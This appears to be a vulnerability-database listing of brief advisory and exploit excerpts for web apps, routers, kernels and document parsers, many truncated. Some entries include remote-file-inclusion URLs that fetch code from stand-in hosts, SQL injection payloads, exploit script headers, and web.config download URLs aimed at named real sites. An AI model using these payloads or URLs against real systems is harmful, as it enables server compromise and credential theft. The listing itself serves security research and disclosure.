SquirrelMail G/PGP Encryption Plugin Multiple Remote Command Execution Vulnerabilities
BUGTRAQ ID: 24874,24782 CVE(CAN) ID: CVE-2005-1924,CVE-2006-4169 SquirrelMail is a multi-featured webmail program implemented in PHP4 that runs on Linux/Unix-type operating systems. SquirrelMail's implementation contains multiple input validation vulnerabilities; remote attackers may exploit them to execute arbitrary commands on the server. The G/PGP encryption plugin in SquirrelMail does not properly filter certain included files: the gpghelp.php and gpghelpbase.php files may include a local file supplied through the "help" HTTP GET request parameter. The code is as follows: 68 // Help...
Program Checker (sasatl.dll 1.5.0.531) Javascript Heap Spraying Exploit
No description provided by source. :. GOODFELLAS Security Research TEAM .: :. http://goodfellas.shellcode.com.ar .: sasatl.dll 1.5.0.531 Program Checker - Javascript Heap Spraying Exploit ======================================================================== Internal ID: VULWAR200706280...
EfesTECH Haber 5.0 (id) Remote SQL Injection Vulnerability
No description provided by source. Title: EfesTECH Haber v5,0 Remote SQL Injection Vulnerability Author: CyberGhost Demo Page: http://www.haberguvercini.com Script Page: http://aspindir.com/indir.asp?id=4899&sIslem=%DDndir Vuln. Username -...
Remotesoft .NET Explorer Remote Stack Buffer Overflow Vulnerability
Remotesoft .NET Explorer is a disassembler tool. Remotesoft .NET Explorer has a buffer overflow when handling cpp files; a remote attacker can exploit the vulnerability to execute arbitrary instructions with the privileges of the application process. Constructing a malicious cpp file and tricking a user into opening it can trigger the issue. Remotesoft .NET Explorer 2.0.1 No detailed solution is currently available: http://www.remotesoft.com/linker/ /usr/bin/ python print "--------------------------------------------------------------" print...
RedBlog Index.PHP Remote File Inclusion Vulnerability
RedBlog is a PHP-based web application. RedBlog does not properly filter user-submitted URI data; a remote attacker can exploit the vulnerability to execute arbitrary commands with the privileges of the web process. The problem is that the 'Index.PHP' script lacks filtering of the user-submitted 'rootpath' parameter; submitting a malicious remote server as the include target can lead to execution of arbitrary PHP code with the privileges of the web process. RedBLoG RedBLoG 0.5 http://redblog.sourceforge.net/ http://www.example.com/Path/index.php?rootpath==http://evilscripts?...
LibTIFF Library Anonymous Field Merging Denial of Service Vulnerability
Libtiff is a standard ANSI C implementation library of the TIFF specification. Libtiff has a problem handling custom tags; a remote attacker can exploit the vulnerability to carry out a denial of service attack against the application. Creating an anonymous field first and then merging a field carrying CODEC information can cause the recognised field to take unexpected values; this state can lead to abnormal behavior, resulting in an application crash or arbitrary code execution. S.u.S.E. UnitedLinux 1.0 S.u.S.E. Linux Professional 10.0 OSS S.u.S.E. Linux Professional 10.0 S.u.S.E. Linux Professional 9.3 x86_64 S.u.S.E. Linux...
NetBSD Ftpd and Tnftpd Port Remote Buffer Overflow Vulnerability
tnftpd is a ported version of the NetBSD FTP server program. NetBSD tnftpd has a remote stack overflow; a remote attacker can exploit the vulnerability to execute arbitrary instructions with the privileges of the application process. To trigger this vulnerability, the attacker must create directories and use GLOB special characters such as the asterisk to overflow an internal stack buffer; carefully crafted submitted data may execute arbitrary instructions with the privileges of the process. tnftpd tnftpd 20040810 NetBSD NetBSD 3.0 No solution is currently available: http://freshmeat.net/projects/tnftpd !perl $$$ NetBSD ftpd and ports Remote ROOOOOT $HOLE$ $$$...
Microsoft Windows MHTML Overlong URI String Overflow Vulnerability (MS06-043)
Microsoft Windows is the very popular operating system released by Microsoft. inetcomm.dll has a stack overflow when handling URLs with the "mhtml:" URI parser; an attacker who successfully exploits this vulnerability can take complete control of the affected system. An attacker can trigger this vulnerability with an overlong URL, for example by tricking a user into opening a malicious site in Internet Explorer or opening a specially crafted Internet shortcut. Microsoft Windows XP SP2 Microsoft Windows XP Professional x64 Edition Microsoft Windows Server 2003 x64 Edition Microsoft...
Nukedit CMS <= 4.9.6 Unauthorized Admin Add Exploit
No description provided by source. KAPDA - Security Science Researchers Institute Advisory : http://www.kapda.ir/advisory-337.html Vendor : http://www.nukedit.com/ What is : Nukedit is a Free Content Management Vulnerability : Unauthorized Admin Add Exploit if "register.asp" is enabled! Discovered...
Knowledge Base Mod <= 2.0.2 (phpBB) Remote Inclusion Vulnerability
No description provided by source. Title: Knowledge Base Mod for PHPbb <= 2.0.2 remote file inclusion URL: http://www.phpbb2.de/dload.php?action=file&fileid=538 Dork: "Powered by Knowledge Base" Credits: Oo Exploit: /includes/kbconstants.php?modulerootpath=http://yourhost/cmd.gif?cmd=ls milw0rm.co...
CubeCart <= 3.0.6 Remote Command Execution Exploit
No description provided by source. !/usr/bin/perl cijfer-ccxpl - CubeCart <=3.0.6 Remote Command Execution Exploit Copyright (c) 2005 cijfer [email protected] All rights reserved. 1. example cijfer@kalma:/research$ perl ./cijfer-ccxpl.pl -h www.xxx.com -d [email protected] /$ id;uname -a uid=48apache...
WordPress The Plus Addons for Elementor Plugin Authentication Bypass Vulnerability (CVE-2021-24175)
...
Insteon Hub HTTPExecuteGet Firmware Update host Parameter Buffer Overflow Vulnerability(CVE-2017-14445)
Summary An exploitable buffer overflow vulnerability exists in Insteon Hub running firmware version 1012. The HTTP server implementation incorrectly handles the host parameter during a firmware update request, leading to a buffer overflow on a global section. An attacker can send an HTTP GET...
phpyun Reinstallation getshell
...
Dedecms V5.7 Two Backend getshell Vulnerabilities (CVE-2018-9175)
The first is a common approach: write a statement into an inc file, which is then pulled in by another include statement, so the malicious code is included and a shell is obtained. The vulnerable code is in /dede/sys_verifies.php. The code is as follows: else if $action == 'getfiles' if!isset$refiles ShowMsg"你没进行任何操作!","sysverifies.php"; exit; $cacheFiles = DEDEDATA.'/modifytmp.inc'; $fp = fopen$cacheFiles, 'w'; fwrite$fp, ''; fclose$fp; $dirinfos = ''; if$...
QCMS Latest Version 3.0.1 Backend Login Verification Bypass, Combined with Arbitrary File Upload for Frontend getshell
...
Multiple vulnerabilities in all versions of ASUS routers
1 ASUSWRT 3.0.0.4.376 - multiple vulnerabilities in httpd server all versions of AsusWRT at the time of report to vendor, for previous 376 version see next section 1. Highly predictable session tokens The session token is generated for an authenticated user using stdlib rand function. The token...
ZKTeco ZKAccess Security System 5.3.1 Stored XSS Vulnerability
Summary ZKAccess Systems are built on flexible, open technology to provide management, real-time monitoring, and control of your access control system-all from a browser, with no additional software to install. Our secure Web-hosted infrastructure and centralized online administration reduce your...
VMware VNC Pointer Decode Code Execution Vulnerability(CVE-2017-4941)
Summary An exploitable code execution vulnerability exists in the remote management functionality of VMware . A specially crafted set of VNC packets can cause a type confusion resulting in stack overwrite, which could lead to code execution. An attacker can initiate a VNC session to trigger this...
Apple Core Graphics BMP Framework img_decode_read Remote Code Execution Vulnerability(CVE-2016-4637)
SUMMARY An exploitable out of bounds write exists in the handling of BMP images on Apple OS X and iOS. A crafted BMP document can lead to an out of bounds write resulting in remote code execution. Vulnerability can be triggered via a saved BMP file delivered by other means when opened in any...
Windows KEPT remote code execution vulnerability analysis(CVE-2017-11779)
According to the Microsoft security advisory, DNSAPI.dll in multiple versions of Windows can lead to RCE with SYSTEM privileges when processing a DNS response. Taking DNS Client API DLL 10.0.15063.0 and 10.0.15063.674 as an example, a patch diff shows that the vulnerability lies in the Nsec3RecordRead function of DNSAPI.dll, so the problem can be pinned down to the parsing of the NSEC3 resource record in the DNS response. To construct a PoC, one first has to understand the background of "NSEC3". First, the DNS protocol data structure is as shown in the figure below; for example, when accessing...
Apple: Multiple Race Conditions in PCIe Message Ring protocol leading to OOB Write and OOB Read(CVE-2017-7115)
Broadcom produces Wi-Fi HardMAC SoCs which are used to handle the PHY and MAC layer processing. These chips are present in both mobile devices and Wi-Fi routers, and are capable of handling many Wi-Fi related events without delegating to the host OS. On iOS, the "AppleBCMWLANBusInterfacePCIe"...
Artifex MuPDF JBIG2 Parser Code Execution Vulnerability(CVE-2016-8729)
Summary An exploitable memory corruption vulnerability exists in the JBIG2 parser of Artifex MuPDF 1.9. A specially crafted PDF can cause a negative number to be passed to a memset resulting in memory corruption and potential code execution. An attacker can specially craft a PDF and send to the...
Poppler PDF Image Display DCTStream::readScan() Code Execution Vulnerability(CVE-2017-2814)
Summary An exploitable heap overflow vulnerability exists in the image rendering functionality of Poppler-0.53.0. A specifically crafted pdf can cause an image resizing after allocation has already occurred, resulting in heap corruption which can lead to code execution. An attacker controlled PDF...
FreeRDP Rdp Client License Read Product Info Denial of Service Vulnerability(CVE-2017-2838)
Summary An exploitable denial of service vulnerability exists within the handling of challenge packets in FreeRDP 2.0.0-beta1+android11. A specially crafted challenge packet can cause the program termination leading to a denial of service condition. An attacker can compromise the server or use ma...
Google Android Broadcom Wi-fi Driver Information Disclosure Vulnerability(CVE-2017-0633)
An information disclosure vulnerability in the Broadcom Wi-Fi driver could enable a local malicious component to access data outside of its permission levels. This issue is rated as Moderate because it first requires compromising a privileged process. Product: Android. Versions: Kernel-3.10,...
Roundcube Mail Body Stored Cross-Site Scripting Vulnerability(CVE-2017-6820)
Author: Badcode, sebao (Knownsec 404 Security Lab) Date: 2017-03-17 0x00 Vulnerability overview 1. Vulnerability description Roundcube is a widely used open-source e-mail program that many organizations and companies around the world have in use. Once successfully installed on the server...
Wordpress Plugin Olimometer 2.56 - SQL Injection
Vulnerability parameters: olimometer_id= Using sqlmap Parameter: olimometer_id GET Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: olimometer_id=1 AND 6227=6227 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: olimometer_id=1...
74cms V3.4 (<20140310) plus/ajax_officebuilding.php SQL Injection Vulnerability
No description provided by source...
Windows OLE Package Manager SandWorm Exploit
No description provided by source. !/usr/bin/env python import os import zipfile import sys ''' Full Exploit: http://www.exploit-db.com/sploits/35019.tar.gz Very quick and ugly SandWorm CVE-2014-4114 exploit builder Exploit Title: CVE-2014-4114 SandWorm builder Built to run on: Linux/MacOSX Date:...
Supermicro Onboard IPMI Port 49152 Sensitive File Disclosure Vulnerability
About IPMI: The Intelligent Platform Management Interface (IPMI) is an open-standard hardware management interface specification that defines a specific method for embedded management subsystems to communicate. IPMI messages are exchanged through the Baseboard Management Controller (BMC), which sits on the hardware component of the IPMI specification. IPMI is the abbreviation of Intelligent Platform Management Interface, a management ... based on...
Arbitrary File Download Vulnerability in a Generic Education CMS
Brief description: Arbitrary file download vulnerability in a generic education CMS. Details: Not sure whether this counts as generic. The web.config file can be downloaded, disclosing the database information file. http://sbc.xzit.edu.cn/hxjc/DownLoad.aspx?Accessory=../web.config http://hedds.njutcm.edu.cn/DownLoad.aspx?Accessory=../web.config http://www.emcjs.org/DownLoad.aspx?Accessory=../web.config...
Linux Kernel < 2.6.36-rc1 CAN BCM - Privilege Escalation Exploit
No description provided by source. / i-CAN-haz-MODHARDEN.c Linux Kernel 2.6.36-rc1 CAN BCM Privilege Escalation Exploit Jon Oberheide [email protected] http://jon.oberheide.org Information: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2959 Ben Hawkes discovered an integer overflow in th...
AllMyGuests <= 0.4.1 (cfg_serverpath) Remote File Include Vulnerability
No description provided by source. ============================================================================ AllMyGuests = ?AMGconfigcfgserverpath Remote File Inclusion Exploit ============================================================================ Script Infected signin.php Critical leve...
Mac OSX Server DirectoryService Buffer Overflow
No description provided by source. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ Mac OSX Server DirectoryService buffer overflow 1. Advisory Information Title: Mac OSX Server DirectoryService buffer overflow Advisory ID: CORE-2013-0103 Advisory URL:...
Emefa Guestbook 3.0 - Remote Database Disclosure Vulnerability
No description provided by source. Title: Emefa Guestbook V 3.0 Remote Database Disclosure Vulnerability Credit: Cyber.Zer0 E-mail: Cyber.Zer04tHotmaildotcom Download: http://www.emefa.dyndns.org/downloads/ Remote: Yes Dork: Emefa Guestbook V 3.0 --=Database Disclosure=--...
Prozilla Hosting Index (directory.php cat_id) - SQL Injection Vulnerability
No description provided by source. .OR.ID ECHOADV88$2008 Prozilla Hosting Index directory.php cat_id Blind Sql...
Siemens Simatic S7-300 PLC Remote Memory Viewer
No description provided by source. Exploit Title: Siemens Simatic S7 300 Remote Memory Viewer Backdoor Date: 7-13-2012 Exploit Author: Dillon Beresford Vendor Homepage: http://www.siemens.com/ Tested on: Siemens Simatic S7-1200 PLC CVE : None require 'msf/core' class Metasploit3 Msf::Auxiliary...
sweetrice cms 0.6.7 - Multiple Vulnerabilities
No description provided by source. Vulnerability ID: HTB22669 Reference: http://www.htbridge.ch/advisory/resetadminpasswordinsweetricecms.html Product: SweetRice CMS Vendor: basic-cms.org http://www.basic-cms.org/ Vulnerable Version: 0.6.7 Vendor Notification: 21 October 2010 Vulnerability Type:...
Invision Power Board <= 3.3.4 unserialize Regex Bypass
No description provided by source. ?php / So this is the patch that sanitizes, static public function safeUnserialize $serialized // unserialize will return false for object declared with small cap o // as well as if there is any ws between O and : if isstring $serialized && strpos $serialized, \...
WEBBDOMAIN Post Card <= 1.02 (catid) SQL Injection Vulnerability
No description provided by source. post Card catid Remote SQL Injection Vulnerability Author: Hussin X Home : www.IQ-TY.com & www.TrYaG.cc MaiL : [email protected] script : http://webbdomain.com/php/postcarden/index2.php script : http://webbdomain.com/php/postcardir/index2.php DorK :...
Cannonbolt Portfolio Manager 1.0 - Multiple Vulnerabilities
No description provided by source. Cannonbolt Portfolio Manager v1.0 Stored XSS and SQL Injection Vulnerabilities Vendor: IWCn Systems Inc. Product web page: http://www.iwcn.ws Affected version: 1.0 Summary: Cannonbolt Portfolio Manager is a sleek and AJAX based PHP script to manage projects and...
TP-Link TL-WR740N Wireless Router - Denial of Service Exploit
No description provided by source. ?!/usr/local/bin/perl TP-Link TL-WR740N Wireless Router Remote Denial Of Service Exploit Vendor: TP-LINK Technologies Co., Ltd. Product web page: http://www.tp-link.us Affected version: - Firmware version: 3.16.4 Build 130205 Rel.63875n Released: 2/5/2013 -...
Apple Safari 6.0.1 for iOS 6.0 and OS X 10.7/8 - Heap Buffer Overflow
No description provided by source. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Packet Storm Advisory 2013-0903-1 http://packetstormsecurity.com/ ...
F-Secure E-mail/Server Security OpenSSL TLS/DTLS Heartbeat Information Disclosure Vulnerability
CVE ID: CVE-2014-0160 The F-Secure E-mail/Server Security and F-Secure Server Security products contain a security vulnerability. The OpenSSL bundled with F-Secure E-mail/Server Security and F-Secure Server Security has a security vulnerability: a boundary error in OpenSSL's handling of the TLS "heartbeat" extension allows an attacker to exploit it to obtain 64k of memory contents from a connected client or server. The memory contents may include private keys, usernames and passwords, and so on. 0 F-Secure E-mail and Server Security 10.x F-Secure E-mail...
GnuTLS Certificate Verification Security Restriction Bypass Vulnerability
BUGTRAQ ID: 65919 CVE(CAN) ID: CVE-2014-0092 GnuTLS is a library implementing the TLS encryption protocol. GnuTLS versions prior to 3.1.22 and 3.2.12 have a security vulnerability in their implementation: error handling in X.509 certificate verification is incorrect and can mark a faulty certificate as valid, which lets a remote user exploit this vulnerability to bypass certificate verification. 0 GnuTLS GnuTLS 3.2.12 GnuTLS GnuTLS 3.1.22 Vendor patch: GnuTLS ------ The vendor has released an upgrade patch to fix this security issue; please download it from the vendor's homepage: http://gnutls.org...
Linksys Series Unspecified Remote Code Execution Vulnerability
No description provided by source. !/usr/bin/php ?php / Exploit for 0day linksys unauthenticated remote code execution vulnerability. As exploited by TheMoon worm; Discovered in the wild on Feb 13, 2013 by Johannes Ullrich. I was hoping this would stay under-wraps until a firmware patch could be...
Discuz! Functional Flaw Allows Login Bypassing the Security Question Under Specific Conditions
Brief description: Details: The Discuz! X cloud platform has a QQ Connect feature that lets a QQ account be bound to a forum account for logging into the forum. However, if the forum account has a security question set, logging in with the linked QQ account still does not require the security question, which creates a security problem. Proof of vulnerability: 0x01. During a security test I obtained the database of a small 5d6d forum and restored it into my phpMyAdmin. Searching through it, I found the password hash of a 5d6d moderator. (A hint here: what the pre_common_member table stores is not the real password md5; the real hash is in the pre_ucenter_members table, and the algorithm is md5(md5($pass).$hash). 0x02. Took the hash to cmd5 for decryption...
FCKeditor 2.4.3 /fckeditor/editor/filemanager/upload/asp/class_upload.asp File Upload Vulnerability
...
PHP 5.3.x 'open_basedir' Security Restriction Bypass Vulnerability
BUGTRAQ ID: 54612 CVE ID: CVE-2012-3365 PHP is an HTML-embedded language; it is quite similar to Microsoft's ASP in that both are server-side scripting languages embedded in HTML documents, its style resembles the C language, and it is now widely used by many web developers. PHP versions prior to 5.3.15 have an error in the SQLite extension that can be exploited to bypass the "open_basedir" feature. 0 PHP 5.3.x Vendor patch: PHP --- The vendor has released an upgrade patch to fix this security issue; please download it from the vendor's homepage: http://www.php.net...